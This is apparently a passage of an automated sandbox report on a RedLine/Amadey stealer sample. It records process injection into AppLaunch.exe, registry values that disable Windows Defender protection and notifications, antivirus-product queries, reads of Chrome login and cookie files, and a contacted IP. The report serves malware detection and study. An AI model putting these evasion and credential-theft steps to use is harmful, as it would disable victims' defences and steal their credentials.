                            Source: b7687179.exe, 00000006.00000003.422596878.00000000015B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMware62M6346KWin32_VideoControllerCWXSDRRHVideoController120060621000000.000000-000.3874714display.infMSBDAGU18O1FLPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsEYYOVXXW
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCode function: 0_2_00A95467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00A95467
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCode function: 0_2_00A92390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00A92390
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeCode function: 1_2_00212390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00212390
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeCode function: 2_2_00BC2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_00BC2390
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCode function: 0_2_00A9202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00A9202A
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_00406CDA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00406CDA
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMemory allocated: page read and write | page guardJump to behavior
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCode function: 0_2_00A96F40 SetUnhandledExceptionFilter,0_2_00A96F40
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCode function: 0_2_00A96CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00A96CF0
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeCode function: 1_2_00216F40 SetUnhandledExceptionFilter,1_2_00216F40
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeCode function: 1_2_00216CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00216CF0
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeCode function: 2_2_00BC6F40 SetUnhandledExceptionFilter,2_2_00BC6F40
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeCode function: 2_2_00BC6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00BC6CF0
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_0040885A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0040885A
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_0040C4CD SetUnhandledExceptionFilter,3_2_0040C4CD
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_00406CDA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00406CDA
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_00403D40 _abort,__NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00403D40
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_00404D05 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00404D05

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Allocates memory in foreign processes
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4180000 protect: page execute and read and writeJump to behavior
                            Injects a PE file into a foreign processes
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4180000 value starts with: 4D5AJump to behavior
                            Writes to foreign memory regions
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4180000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 43FB008Jump to behavior
                            .NET source code references suspicious native API functions
                            Source: b7687179.exe.2.dr, SystemDataCommonTimeSpanStorager.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibraryA@kernel32.dll')
                            Source: 3.3.a4758283.exe.470000.0.unpack, Program.csReference to suspicious API methods: ('OpenProcessToken', 'OpenProcessToken@advapi32.dll')
                            Source: 5.2.AppLaunch.exe.4180000.0.unpack, Program.csReference to suspicious API methods: ('OpenProcessToken', 'OpenProcessToken@advapi32.dll')
                            Source: 6.0.b7687179.exe.e80000.0.unpack, SystemDataCommonTimeSpanStorager.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibraryA@kernel32.dll')
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exeJump to behavior
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCode function: 0_2_00A918A3 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,0_2_00A918A3
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: GetLocaleInfoA,3_2_0041195E
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,3_2_00414965
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,3_2_0041117F
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,3_2_0040F990
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_00411240
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,3_2_00410256
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,3_2_00409A6D
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,3_2_004112E3
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,3_2_00414AE9
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_004112A7
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,3_2_00414AB5
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_00414C28
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: GetLocaleInfoA,3_2_0040A571
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,3_2_00410D8A
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,3_2_00410EA1
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,3_2_00410F39
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,3_2_004117D0
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,3_2_0040FFFE
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,3_2_00410FAD
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeQueries volume information: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCode function: 0_2_00A97155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00A97155
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCode function: 0_2_00A92BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,0_2_00A92BFB

                            Lowering of HIPS / PFW / Operating System Security Settings

                            barindex
                            Disable Windows Defender real time protection (registry)
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1Jump to behavior
                            Disable Windows Defender notifications (registry)
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                            Source: b7687179.exe, 00000006.00000002.438530061.000000000649C000.00000004.00000020.00020000.00000000.sdmp, b7687179.exe, 00000006.00000003.424683183.000000000649B000.00000004.00000020.00020000.00000000.sdmp, b7687179.exe, 00000006.00000003.422596878.00000000015BF000.00000004.00000020.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426655979.00000000015C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                            Stealing of Sensitive Information

                            barindex
                            Yara detected RedLine Stealer
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: 2.3.v6434086.exe.4c3f81e.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.3.v6434086.exe.4c3f81e.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.b7687179.exe.e80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000006.00000000.361157707.0000000000E82000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000003.358780202.0000000004C12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: b7687179.exe PID: 3320, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe, type: DROPPED
                            Yara detected Amadeys stealer DLL
                            Source: Yara matchFile source: 1.3.v7020033.exe.4d85c20.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 1.3.v7020033.exe.4d85c20.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000001.00000003.357315003.0000000004D41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\c6803120.exe, type: DROPPED
                            Tries to harvest and steal browser information (history, passwords, etc)
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                            Source: Yara matchFile source: Process Memory Space: b7687179.exe PID: 3320, type: MEMORYSTR

                            Remote Access Functionality

                            barindex
                            Yara detected RedLine Stealer
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: 2.3.v6434086.exe.4c3f81e.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.3.v6434086.exe.4c3f81e.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.b7687179.exe.e80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000006.00000000.361157707.0000000000E82000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000003.358780202.0000000004C12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: b7687179.exe PID: 3320, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe, type: DROPPED

                            Mitre Att&ck Matrix

                            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                            Valid Accounts221
                            Windows Management Instrumentation                            		Path Interception2
                            Bypass User Access Control                            		21
                            Disable or Modify Tools                            		1
                            OS Credential Dumping                            		1
                            System Time Discovery                            		Remote Services1
                            Archive Collected Data                            		Exfiltration Over Other Network Medium2
                            Encrypted Channel                            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                            System Shutdown/Reboot
                            Default Accounts13
                            Native API                            		Boot or Logon Initialization Scripts1
                            Access Token Manipulation                            		1
                            Deobfuscate/Decode Files or Information                            		1
                            Input Capture                            		1
                            File and Directory Discovery                            		Remote Desktop Protocol1
                            Data from Local System                            		Exfiltration Over Bluetooth1
                            Non-Standard Port                            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                            Domain Accounts2
                            Command and Scripting Interpreter                            		Logon Script (Windows)311
                            Process Injection                            		21
                            Obfuscated Files or Information                            		Security Account Manager137
                            System Information Discovery                            		SMB/Windows Admin Shares1
                            Input Capture                            		Automated Exfiltration1
                            Application Layer Protocol                            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                            Timestomp                            		NTDS341
                            Security Software Discovery                            		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
                            Bypass User Access Control                            		LSA Secrets11
                            Process Discovery                            		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                            Replication Through Removable MediaLaunchdRc.commonRc.common1
                            Masquerading                            		Cached Domain Credentials231
                            Virtualization/Sandbox Evasion                            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                            External Remote ServicesScheduled TaskStartup ItemsStartup Items231
                            Virtualization/Sandbox Evasion                            		DCSync1
                            Application Window Discovery                            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                            Access Token Manipulation                            		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)311
                            Process Injection                            		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                            Rundll32                            		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 signatures2 2 Behavior Graph ID: 876163 Sample: qu0t4ukLoN.exe Startdate: 26/05/2023 Architecture: WINDOWS Score: 100 55 Snort IDS alert for network traffic 2->55 57 Found malware configuration 2->57 59 Malicious sample detected (through community Yara rule) 2->59 61 12 other signatures 2->61 9 qu0t4ukLoN.exe 1 4 2->9         started        12 rundll32.exe 2->12         started        14 rundll32.exe 2->14         started        16 rundll32.exe 2->16         started        process3 file4 45 C:\Users\user\AppData\Local\...\v7020033.exe, PE32 9->45 dropped 47 C:\Users\user\AppData\Local\...\d4851931.exe, PE32 9->47 dropped 18 v7020033.exe 1 4 9->18         started        process5 file6 37 C:\Users\user\AppData\Local\...\v6434086.exe, PE32 18->37 dropped 39 C:\Users\user\AppData\Local\...\c6803120.exe, PE32 18->39 dropped 63 Antivirus detection for dropped file 18->63 65 Multi AV Scanner detection for dropped file 18->65 67 Machine Learning detection for dropped file 18->67 22 v6434086.exe 1 4 18->22         started        signatures7 process8 file9 41 C:\Users\user\AppData\Local\...\b7687179.exe, PE32 22->41 dropped 43 C:\Users\user\AppData\Local\...\a4758283.exe, PE32 22->43 dropped 69 Antivirus detection for dropped file 22->69 71 Machine Learning detection for dropped file 22->71 26 a4758283.exe 1 22->26         started        29 b7687179.exe 4 22->29         started        signatures10 process11 dnsIp12 73 Multi AV Scanner detection for dropped file 26->73 75 Machine Learning detection for dropped file 26->75 77 Writes to foreign memory regions 26->77 87 2 other signatures 26->87 32 AppLaunch.exe 9 1 26->32         started        35 conhost.exe 26->35         started        49 83.97.73.122, 19062, 49697 UNACS-AS-BG8000BurgasBG Germany 29->49 79 Antivirus detection for dropped file 29->79 81 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 29->81 83 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 29->83 85 Tries to harvest and steal browser information (history, passwords, etc) 29->85 signatures13 process14 signatures15 51 Disable Windows Defender notifications (registry) 32->51 53 Disable Windows Defender real time protection (registry) 32->53

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            qu0t4ukLoN.exe53%ReversingLabsByteCode-MSIL.Trojan.RedLineStealer
                            qu0t4ukLoN.exe53%VirustotalBrowse
                            qu0t4ukLoN.exe100%AviraHEUR/AGEN.1307453
                            qu0t4ukLoN.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Local\Temp\IXP000.TMP\d4851931.exe100%AviraHEUR/AGEN.1311185
                            C:\Users\user\AppData\Local\Temp\IXP001.TMP\c6803120.exe100%AviraHEUR/AGEN.1317762
                            C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exe100%AviraHEUR/AGEN.1307453
                            C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exe100%AviraHEUR/AGEN.1307453
                            C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe100%AviraHEUR/AGEN.1307453
                            C:\Users\user\AppData\Local\Temp\IXP000.TMP\d4851931.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\IXP001.TMP\c6803120.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe100%Joe Sandbox ML
